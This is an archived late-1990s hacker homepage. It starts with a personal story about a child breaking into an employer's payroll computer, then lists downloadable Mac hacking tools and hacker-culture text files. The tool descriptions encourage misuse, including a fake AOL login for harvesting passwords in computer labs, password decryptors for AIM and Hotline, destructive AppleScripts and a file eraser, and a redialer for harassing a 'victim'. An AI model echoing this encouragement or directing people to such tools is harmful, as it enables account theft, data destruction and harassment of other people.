It was a teacher conference day so there wasn't any school. My mother didn't have anyone to look after me, so she had to take me to work with her. Her boss tended to take a lot of business trips so she was rarely around. I kept myself busy by drawing and making photocopies of my hands. Then my mother brought me into her boss's office to see something. She sat me down in front of it and I was enthralled. At first I would only use MacPaint. My mom knew I would enjoy the painting program because of my interest in art but it wasn't just the fact that you could paint, draw, and erase with more ease on the machine then you could in real life, there was something about it that I fell in love with. After a while I started exploring the rest of the amazing little world inside the gray box. I had already learned how to use one program on it, so I could use just about any other one. All I had to do was double-click on a picture and experiment a little. I wanted to learn everything about this funny looking gray box, What does this program do?, What about this one?, How does the disk work?

Then I found a paticularly interesting program. After playing with it for a while something new popped up. It said "Access Denied". WHAT!? How could it do that to me!? That's not fair! I don't care what you say box, I'm not stoping my exploration because you don't want to play anymore. I tried and tried for about an hour. Nothing would work. Then, suddenly, I heard the sounds of a telephone dialing. I WAS IN! I heard noises that I would learn to call 'Modem Breadth' and I was ecstatic. The noise had caught the attention of my mom. When she came in to find the word "Payroll" written across the stop of the screen, she was a little amazed and a little perturbed. No more playing with the boss's computer for me.

A couple days later, I was sitting at home one evening and the phone rang. My mom was working late as usual, sometimes she wouldn't get home until 11 or 12 at night. But she said she had to do it because we needed the extra money that she got from working overtime. She was with one of her coworkers who was having trouble with the computer. She had to update the payroll file and didn't know how. Mom had called me so that I could explain to her coworker how to do it.

I worked out a deal with my parents. If I got the highest grades in my class, they would buy me a Mac. I worked really hard and at the end of the year I brought my parents in to see the teacher and she told them that my grades were so good that I deserved the computer. Unfortunately, my mom had recently been laid off from her job six months before she was eligible for her pension. She got unemployment benefits from the government but it wasn't enought to cover something as expensive as a computer. The only access I had was my computer class at school. They at a nice computer lab with about twenty five Apple II computers. I learned basic and logo and I played loderunner a lot.

A few years later, my mom came home from her new job and told me that she made a deal wth her job. They would buy a Macinosh for her to do her work at home and take a small deduction from her paycheck every week until it was paid off.

That's how I got started. I still have my first Mac along with a PowerPC, an Apple IIgs and 2 Apple IIe's that I got from a yard sale, an IBM XT & PS2 that I found in the trash, and a bunch of other computers laying around the house in various pieces.

I will always remember how my parents sacrificed so that I could get the best education possible. I don't care how many times the words "ACCESS DENIED" are thrown in my face. I'm going to get the best education posssible even if it includes learning things that you don't want me to know.

...Q\\'EST


Downloading: If you have trouble downloading these files here are some helpfull tips. You can download them in usually only three different ways. (1) If your browser is set to automatically download BinHexed files then just click on the link. (2) If you click on the link and it takes you to a page full of gibberish, then save all that gibberish to a file and decode it. (3) You can also click and hold the link until a menu pops up. Select 'Save This Link As..." You will need a decompression utility such as 'Stuffit Expander', 'Stuffit Deluxe', or BinHex 4.0 to decode these files.


Seek & Destroy IV
Seek & Destroy IV is a wardialer. It will scan the phone numbers in an exchange that you specify and it will record the phone numbers of any modems that it finds.
Download: Seek & Destroy IV 1.068k - 336k

krAIMer II
AOsmelL completely revamped AIM thus making krAIMer 1.0 unable to find the passwords on machines running the newest version of AIM. So we revamped krAIMer. krAIMer II can find and decrypt passwords for all versions of AIM.
Download: krAIMer 2.068k - 404k
Download: krAIMer 2.0FAT - 774k
Download: krAIMer 2.0PPC - 424k

MacFOVC
This programs converts hex codes into channel numbers for following cell calls on Motorola phones. Original source code written by Doctor Who.
Download: MacFOVC 1.068k - 32k

BreakIn
Tools and instructions on getting into a Macintosh protected with LockOut software.
Download: BreakIn 1.0PPC - 352k

krAIMer
We kracked the encryption system used by AOL for their program 'AIM' (AOL Instant Messenger). They use this system to encrypt the users' passwords before storing them in the preferences file. This program will open up the preferences file and decrypt all of the passwords in it.
Download: krAIMer 1.068k - 308k
Download: krAIMer 1.0FAT - 590k
Download: krAIMer 1.0PPC - 340k

HotDecrypt
Decrypts the passwords stored in Hotline UserData files. Can also encrypt plain text using the same method hotline servers use to encrypt thier passwords.
Download: HotDecrypt 1.068k - 314k
Download: HotDecrypt 1.0FAT - 676k
Download: HotDecrypt 1.0PPC - 364k

AlmostOnline b1
This program looks like AOL when launched but after the user enter his/her screen name and password and attempts to log on to AOL, the application appears to crash. What really happened was that the program saved the screen name and password. This spoof is good to use in computer labs to collect a large volume of passwords.
Download: AlmostOnline b1 - 82k

BigSecretPasswordNabber
Launch, press the 'open' button and you've got the password to BigSecret. Good to have in your 'Mobile Hack Pack' for those macs you come across.
Download: BigSecretPasswordNabber 1.0 - 432k

Killer Scripts
These Applescripts are guaranteed to fuck up your mac in one way or another. Please be carefull with them. Damaging someone's property is not something to be taken lightly.
Download: KillerScripts - 62k

Script Saviors
This includes two antidote scripts to two of the killer scripts and a phile on prevention and clean up of applescript trojan horses, whih have become VERY common lately.
Download: ScriptSaviors - 14k

AngelOfDeath
When launched this app will erase all other files and folders in it's directory. There are hundred of uses for this one.
Download: AngelOfDeath 1.0 - 444k

Mac.Annoy
This is the MOD's .annoy ported for Macintosh. You give it a phone number and it will dial it over and over and over and over again until you decide to have mercy on your victim.
Download: Mac.Annoy 1.068k - 504k
Download: Mac.Annoy 1.0PPC - 788k
Download: Mac.Annoy 1.0FAT - 524k

Desktop Deception
This is a phile for newbies on macintosh desktop deception. If you don't know what it is already, read it.
Download: DesktopDeception - 44k

NUA DBMaker
I use this utility to organize my sprintnet nua scans. It is programed to sort through Sabrescan output files for valid nua's and then allows me to add comments to each such as the operating system and the name of the computer's owner (or passwords, etc.).
Download; NUADBMaker 1.0 -456k

NUA DBViewer
This is a simple veiwer for the database files created by NUA DBMaker.
Download: NUADBViewer 1.0 - 446k



Text Philes

Over the years that I have been interested in hacking and computers in general I have amassed a large collection of text philez. Here I have include a few that are of interest to old hackers as well as newbies. The general section includes philez that describe our culture and the section regarding the law include articles that will make newbies/wannabees aware of the danger that awaits them should they choose to pursue our way of life. And it might remind the hackers that have been around a while just how dangerous our hobby/addiction/life really is. Enjoy...

General:

A Portrait of J. Random Hacker
Is Your Kid A Hacker?
The Mentor's Last Words
Zen And The Art OF Hacking
Are You A Hacker?
A Brief History Of The Hacker
How To Become A Hacker
Why I'm A Hacker

The Law:

About Juvenile Protection
Visit Your Local Secret Service
You And The Police
Undercover Computer Cops
SPA Hotline Sting
SPA Letter to ISP's
Undercover SPA Guy Traced
Another SPA Guy Traced
The Constitution of The U.S.A.
Clinton's Anti-Piracy Act
Computer Fraud And Abuse Act Addendum
Interview With Computer Cops
Computer Security And The Law
Congress vs. Technology
Don't Talk To Cops!
FTC Crackdown on Net Fraud
ICQ-Conspiracy?
Laws Regarding Tempest Technology





You are hacker number...
...to be enlightened by [stw]
Since January 11, 1999
Web Site Hosting Provided By Geocities.
Copyright 1998-1999 [stw] Inc.






L0phtCrack Banner




HackUser Banner




1